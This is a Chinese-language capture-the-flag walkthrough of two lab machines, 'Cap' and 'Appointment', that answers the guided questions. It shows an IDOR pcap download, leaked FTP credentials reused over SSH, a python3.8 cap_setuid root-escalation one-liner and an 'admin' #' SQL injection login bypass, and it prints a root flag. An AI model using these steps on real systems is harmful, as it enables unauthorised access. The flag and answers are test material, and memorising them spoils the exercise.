1.cap

1.How many TCP ports are open?

用nmap扫描,指令如下:

1
nmap -sV -sC -O -T4

开启了21,22,80端口

答案为3

2.After running a “Security Snapshot”, the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

用浏览器访问,点击以后自动跳转到/data/1。

答案为data

3.Are you able to get to other users’ scans?

访问/data/0,访问成功,

答案为yes

4.What is the ID of the PCAP file that contains sensative data?

访问/data/0,点击download可以下载0.pcap。用CTFNeta可以梭出z用户名和密码。

1
2
# user:nathan
# passwd:Buck3tH4TF0RM3!

答案为0。

5.Which application layer protocol in the pcap file can the sensetive data be found in?

0.pcap里面是ftp的用户名和密码。

答案为ftp

6.We’ve managed to collect nathan’s FTP password. On what other service does this password work?

之前扫描端口发现22端口也开着,猜测密码和用户名服用,成功连接ssh。

答案;ssh

7.Submit the flag located in the nathan user’s home directory.

ssh连接,ls后cat user.txt即可获得flag。

8.What is the full path to the binary on this machine has special capabilities that can be abused to obtain root privileges?

上传linpeas.sh到远程

1
scp ~/linpeas.sh nathan@10.129.37.234:~/

运行,

发现/usr/bin/python3.8 带了 cap_setuid。

1
2
python3.8 -c 'import os; os.setuid(0); os.system("id && whoami && bash
 -p")'

实现提权。

答案:/usr/bin/python3.8

9.Submit the flag located in root’s home directory.

读取/root/root.txt

1
2
4f6d64b33dfc0ce5062bdc797e4e7680

2.Appointment

1.What does the acronym SQL stand for?

answer: Structured Query Language

2.What is one of the most common type of SQL vulnerabilities?

answer: sql injection

3.What is the 2021 OWASP Top 10 classification for this vulnerability?

answer: A03:2021-Injection

4.What does Nmap report as the service and version that are running on port 80 of the target?

用nmap扫描,结果如下:

1
2
3
4
5
6
7
8
9
10
sudo nmap -Pn -sV 10.129.128.37
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-21 11:37 +0800
Nmap scan report for 10.129.128.37
Host is up (0.44s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.35 seconds

answer: Apache httpd 2.4.38 ((Debian))

5.What is the standard port used for the HTTPS protocol?

answer: 443

6.What is a folder called in web-application terminology?

answer: directory

7.What is the HTTP response code that is returned for Not Found errors?

answer: 404

8.Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?

answer: dir

9.What single character can be used to comment out the rest of a line in MySQL?

answer: #

10.If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

访问http服务,尝试sql注入,发现

1
2
username: admin' #
password: 0

即可登陆成功,获得flag。